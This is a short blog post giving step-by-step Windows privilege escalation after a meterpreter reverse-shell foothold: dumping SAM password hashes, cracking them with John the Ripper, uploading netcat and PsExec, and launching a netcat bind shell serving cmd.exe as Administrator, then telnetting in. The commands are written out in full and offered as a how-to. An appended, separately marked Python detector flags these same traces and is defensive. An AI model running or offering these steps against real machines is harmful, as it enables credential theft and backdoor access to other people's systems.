Tuesday, January 14, 2014

Privilege escalation


Steps:
------
(after connecting to the remote computer with the win32_reverse_meterpreter payload)
1) Load the file system library, the SAM library, and the process library.
ex.
use -m Fs
use -m Sam
use -m Process
2) Get the Windows password hashes.
ex.
gethashes
(gethashes is part of the SAM library)
3) Crack the Admin's hash with John the Ripper.
ex.
john /tmp/dump-01.txt
4) Upload Netcat, PsExec, and whoami. Netcat is a useful program for setting up a backdoor on a computer. PsExec can select which user to run a program under. whoami just tells you which user you are logged in as.
ex.
upload /tmp/nc.exe c:
upload /tmp/psexec.exe c:
upload /tmp/whoami.exe c:
5) Run a Netcat server under the Admin's account!
ex.
psexec.exe \\127.0.0.1 -u Administrator -p hacker c:\nc.exe -L -d -e cmd.exe -p 6969
6) Telnet into the Netcat server and you now have admin access!!!
ex.
telnet 192.168.0.6 6969
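A defender-side counterpart to steps 4 to 6, added here as an example and not part of the original post: a small Python detector run over constructed process-creation records (made up for this example; the field names "image", "parent", "user" and "cmdline" are assumptions, not a real log schema) that flags the traces this procedure leaves on the host, a netcat-style listener that executes cmd.exe for each connection, PsExec run with explicit credentials, a process spawned under PSEXESVC, and executables dropped straight into the drive root.

```python
"""Flag the host-side traces of a PsExec-launched netcat listener.

The records below are constructed for this example; they only imitate the
shape of a process-creation event and are not taken from any real system.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample records (not real telemetry). The second and third
# mirror the command line used in the write-up above; the others are benign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"image": r"C:\psexec.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "user": "WORKSTATION\\bob",
     "cmdline": r"psexec.exe \\127.0.0.1 -u Administrator -p hacker c:\nc.exe -L -d -e cmd.exe -p 6969"},
    {"image": r"C:\nc.exe",
     "parent": r"C:\Windows\PSEXESVC.exe",
     "user": "WORKSTATION\\Administrator",
     "cmdline": r"c:\nc.exe -L -d -e cmd.exe -p 6969"},
    {"image": r"C:\Program Files\Editor\editor.exe",
     "parent": r"C:\Windows\explorer.exe",
     "user": "WORKSTATION\\bob",
     "cmdline": r'"C:\Program Files\Editor\editor.exe" notes.txt'},
]


@dataclass
class Finding:
    rule: str      # short name of the rule that fired
    cmdline: str   # the command line that triggered it


# A listener (-l / -L) that also hands a shell to whoever connects (-e / -c cmd.exe).
LISTEN_FLAG = re.compile(r"(?:^|\s)-[lL](?:\s|$)")
EXEC_SHELL = re.compile(r"(?:^|\s)-[ec]\s+(?:\S*\\)?(?:cmd|powershell)(?:\.exe)?\b", re.I)
# PsExec invoked with an explicit user (-u), i.e. running something as another account.
PSEXEC_IMAGE = re.compile(r"(?:^|\\)psexec(?:64)?\.exe$", re.I)
EXPLICIT_USER = re.compile(r"(?:^|\s)-u\s")
# Anything whose parent is the PsExec service stub was started remotely.
PSEXESVC = re.compile(r"(?:^|\\)psexesvc\.exe$", re.I)
# An executable sitting directly in the drive root, like the uploads in step 4.
ROOT_DROP = re.compile(r"^[A-Za-z]:\\[^\\]+\.exe$", re.I)


def analyze(event: dict) -> list[Finding]:
    """Return every rule that matches one process-creation record."""
    findings: list[Finding] = []
    cmd, image, parent = event["cmdline"], event["image"], event["parent"]
    if LISTEN_FLAG.search(cmd) and EXEC_SHELL.search(cmd):
        findings.append(Finding("bind-shell-listener", cmd))
    if PSEXEC_IMAGE.search(image) and EXPLICIT_USER.search(cmd):
        findings.append(Finding("psexec-with-explicit-credentials", cmd))
    if PSEXESVC.search(parent):
        findings.append(Finding("child-of-psexesvc", cmd))
    if ROOT_DROP.match(image):
        findings.append(Finding("executable-in-drive-root", cmd))
    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map each record index to the names of the rules it triggered."""
    return {i: [f.rule for f in analyze(ev)] for i, ev in enumerate(events) if analyze(ev)}


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {ev['user']}: {ev['cmdline']}")
        for rule in rules:
            print(f"      -> {rule}")
```

Each rule on its own is noisy (administrators do run PsExec), but the combination seen here, PsExec with a supplied password spawning a root-dropped nc.exe that listens and executes cmd.exe, is what an alert should be written around; the listener itself is also visible from the network as a new open port on the host.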
Enjoy! Please like, subscribe and follow.
